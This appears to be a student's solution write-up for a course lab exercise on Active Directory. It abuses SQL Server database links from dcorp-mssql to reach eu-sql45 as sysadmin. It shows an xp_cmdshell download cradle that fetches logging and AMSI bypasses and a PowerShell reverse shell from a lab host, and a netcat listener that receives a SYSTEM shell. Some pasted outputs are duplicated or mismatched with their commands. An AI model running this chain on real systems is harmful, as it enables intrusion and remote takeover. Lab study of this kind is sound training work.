22 - LO 2️2️

Learning Object 22

Tasks

1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Flag 37 [dcorp-mssql] - First SQL Server linked to dcorp-mssql 🚩

Flag 38 [dcorp-mssql] - Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

Flag 39 [dcorp-mssql] - SQL Server privileges on eu-sql 🚩

Flag 40 [dcorp-mssql] - Privileges on operating system of eu-sql 🚩

Solutions

1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Let's start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that. Run the below command from a PowerShell session started using Invisi-Shell:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

So, we can connect to dcorp-mssql. Using HeidiSQL client, let's login to dcorp-mssql using windows authentication of studentx. After login, enumerate linked databases on dcorp-mssql:

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

So, there is a database link to dcorp-sql1 from dcorp-mssql. Let's enumerate further links from dcorpsql1. This can be done with the help of openquery:

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xo_cmdshell 'whoami'"

Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

We can also use Get-SQLServerLinkCrawl for crawling the database links automatically:

select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')

Sweet! We have sysadmin on eu-sql server!

If xp_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command:

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"

Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Create Invoke-PowerShellTcpEx.ps1:

• Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.

• Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).

• Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Let's try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance, first to it, add sw on HFS and remember to edit Invoke-PowerShellTcpEx changing IP and Port

After that start a listener in a new shell: C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.67/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql45

Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

On the listener:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
$env:username
$env:computername

Flag 37 [dcorp-mssql] - First SQL Server linked to dcorp-mssql 🚩

The first SQL Server linked to dcorp-mssql is DCORP-SQL1.

Links on this server: DCORP-SQL1

Flag 38 [dcorp-mssql] - Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

sqluser is the name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt.

Server: EU-SQLX
- Link IsSysAdmin: 1

Flag 39 [dcorp-mssql] - SQL Server privileges on eu-sql 🚩

The SQL Server privileges on eu-sql is sysadmin.

Server: EU-SQLX
- Link IsSysAdmin: 1

Flag 40 [dcorp-mssql] - Privileges on operating system of eu-sql 🚩

PS C:\Windows\system32>$env:username
system